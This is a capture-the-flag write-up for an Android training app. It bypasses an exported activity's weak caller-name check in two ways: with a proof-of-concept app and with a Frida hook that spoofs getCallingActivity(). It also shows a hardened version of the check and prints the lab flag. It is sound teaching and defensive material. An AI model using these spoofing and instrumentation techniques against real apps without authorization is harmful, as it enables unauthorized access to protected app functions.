Static Analysis

AndroidManifest.xml

Upon inspecting the Flag8Activity entry in the AndroidManifest.xml file we see the following:

<activity  
	android:name="io.hextree.attacksurface.activities.Flag8Activity"  
	android:exported="true"/>

Since exported is set to true, any app on the device can start this activity, including our exploit APK. Let's review the code to see how we can get the flag.

Flag8Activity Class

/* loaded from: classes.dex */  
public class Flag8Activity extends AppCompactActivity {  
    public Flag8Activity() {  
        this.name = "Flag 8 - Do you expect a result?";  
        this.tag = "ActivityResult";  
        this.flag = "SswwbqGWnA950TVWt2lccPUGxr4PyWorpunFllh8DOY=";  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        Log.i("Process", "id in stealing flag 8: " + Process.myPid());  
        this.f = new LogHelper(this);  
        ComponentName callingActivity = getCallingActivity();  
        if (callingActivity != null) {  
            if (callingActivity.getClassName().contains("Hextree")) {  
                this.f.addTag("calling class contains 'Hextree'");  
                success(this);  
            } else {  
                Log.i("Flag8", "access denied");  
                setResult(0, getIntent());  
            }  
        }  
    }  
}

Reviewing the code, we notice it checks only one thing:

if (callingActivity.getClassName().contains("Hextree")) {  
	this.f.addTag("calling class contains 'Hextree'");  
	success(this);  
}

It checks whether the calling activity's class name contains the string Hextree. getCallingActivity() returns the fully qualified ComponentName (package plus class name) of the activity that started this one with startActivityForResult(), and the calling app picks its own package and class names when it is built, so a substring match on that name is a trivial condition to satisfy. Let's craft the PoC.
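For contrast, here is how the same gate would look if it were meant to hold. This is an added example, not code from the page or from the Hextree app: the class name Flag8ActivityHardened and the allowlisted package in TRUSTED_CALLER_PKG are assumptions made for illustration. It replaces the substring check with an exact package match, ties that package to the app's own signing certificate, and treats a null caller (a plain startActivity()) as a denial.

```java
import android.content.ComponentName;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import androidx.appcompat.app.AppCompatActivity;

public class Flag8ActivityHardened extends AppCompatActivity {

    // Hypothetical allowlist: the exact package of the only caller allowed to
    // receive a result from this activity (assumed value for illustration).
    private static final String TRUSTED_CALLER_PKG = "io.hextree.attacksurface";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        if (!isCallerTrusted()) {
            // Same failure path as the original: no secret, cancelled result.
            Log.i("Flag8", "access denied");
            setResult(RESULT_CANCELED);
            finish();
            return;
        }
        // Only here may the secret be released, e.g. via setResult(RESULT_OK, ...).
        Log.i("Flag8", "trusted caller " + getCallingPackage());
    }

    /*
     * Original (weak):
     *     callingActivity.getClassName().contains("Hextree")
     * The calling app chooses its own package and class names, so any
     * substring check on them is satisfiable by renaming a class.
     */
    private boolean isCallerTrusted() {
        ComponentName caller = getCallingActivity();
        if (caller == null) {
            // Started with startActivity() rather than startActivityForResult():
            // nobody is waiting for a result, so there is nothing to hand back.
            return false;
        }
        // 1. Exact match on the package, which the system records for the real
        //    caller; a substring match would also accept com.evil.HextreeMain.
        if (!TRUSTED_CALLER_PKG.equals(caller.getPackageName())) {
            return false;
        }
        // 2. Bind the package name to a signing certificate: a side-loaded APK
        //    reusing the package name with a different signer is rejected.
        int sig = getPackageManager().checkSignatures(getPackageName(), caller.getPackageName());
        return sig == PackageManager.SIGNATURE_MATCH;
    }
}
```

Two caveats on scope. If no other app legitimately needs this activity, the simplest fix is android:exported="false" and no caller check at all. And none of this survives in-process instrumentation of the kind used in Option 2 further down: a Frida hook on a rooted device can return whatever getCallingActivity() value it likes, which is a compromised-device threat model that an exported activity cannot defend against on its own.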

Creating POC

Option 1

We can simply create an activity whose fully qualified class name contains Hextree and start the target with startActivityForResult(). The "for result" part matters: getCallingActivity() returns null when the target was started with a plain startActivity(), so the check would never even run (the activity's own title, "Do you expect a result?", hints at this):

import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import androidx.appcompat.app.AppCompatActivity;

public class HextreeFlag8 extends AppCompatActivity {
    private static final int REQUEST_FLAG8 = 1;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_flag08);

        Button button = findViewById(R.id.button_flag8);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Log.v("HEXTREE", "Going to flag 8 activity");

                Intent targetIntent = new Intent();
                targetIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag8Activity"));

                // Start *for a result*: only then does the target's getCallingActivity()
                // return our ComponentName, whose class name "HextreeFlag8" contains "Hextree".
                startActivityForResult(targetIntent, REQUEST_FLAG8);
            }
        });
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);
        if (requestCode == REQUEST_FLAG8) {
            // 0 (RESULT_CANCELED) is what the target sets on the "access denied" path.
            Log.v("HEXTREE", "Flag8Activity returned resultCode=" + resultCode);
        }
    }
}

Option 2

I didn't want to change the class name from Flag08 to a name containing Hextree, so I used Frida to intercept the APK and return the desired component name. Here are the steps.

Download frida and set it up on the emulator

 adb push frida-server /data/local/tmp/
frida-server: 1 file pushed, 0 skipped. 315.5 MB/s (110713240 bytes in 0.335s)

 adb shell "chmod 755 /data/local/tmp/frida-server"

 adb root
 adb shell "/data/local/tmp/frida-server &"

frida-server has to run as root to instrument other apps' processes; on a standard (non Google Play) emulator image, adb root restarts adbd as root so the server can be launched from adb shell, and the trailing & keeps it running in the background.

You can download the executable from Frida's GitHub releases page. Pick the build matching the emulator's ABI (x86_64 for the default emulator images) and the same version as the frida CLI on your host (17.5.1 in this session), since client and server versions must match.

Creating the script and connecting to frida’s server

We will write a script that hooks Activity.getCallingActivity() and returns a ComponentName whose class name contains Hextree:

Java.perform(() => {
    var Activity = Java.use("android.app.Activity");
    var ComponentName = Java.use("android.content.ComponentName");

    // Replace getCallingActivity() for every Activity in the process (Flag8Activity
    // inherits it), so the target always sees a caller whose class name contains
    // "Hextree", regardless of who actually started it or whether it was started
    // for a result at all.
    Activity.getCallingActivity.implementation = function () {
        var fakeComponent = ComponentName.$new("com.fake.Hextree", "com.fake.Hextree.HextreeActivity");

        console.log("[+] Hooked getCallingActivity(), returning fake ComponentName");
        return fakeComponent;
    };
});

After that we attach frida to the target app and load the script. -N attaches by package identifier to an already running process, so launch io.hextree.attacksurface on the emulator first:

 frida -U -l flag9.js -N "io.hextree.attacksurface"
     ____
    / _  |   Frida 17.5.1 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Android Emulator 5554 (id=emulator-5554)
[Android Emulator 5554::io.hextree.attacksurface ]->

Now we can start Flag8Activity from any class we want and we will get the flag. Because the hook supplies the ComponentName itself, a plain startActivity() is enough here; the target never consults the real caller. Note that this works only because the hook runs inside the target's own process on a rooted emulator, so it demonstrates the weak check rather than a cross-app bypass. Button to retrieve the flag:

Button button = findViewById(R.id.button_flag8);
button.setOnClickListener(new View.OnClickListener() {
	@Override
	public void onClick(View v) {
		Log.v("HEXTREE", "Going to flag 8 activity");

		Intent targetIntent = new Intent();
		targetIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag8Activity"));

		// No startActivityForResult() needed: the Frida hook returns the fake
		// ComponentName even when nobody is waiting for a result.
		startActivity(targetIntent);
	}
});

Output in frida

[Android Emulator 5554::io.hextree.attacksurface ]-> [+] Hooked getCallingActivity(), returning fake ComponentName

Flag

HXT{no-expected-return-ds282ba}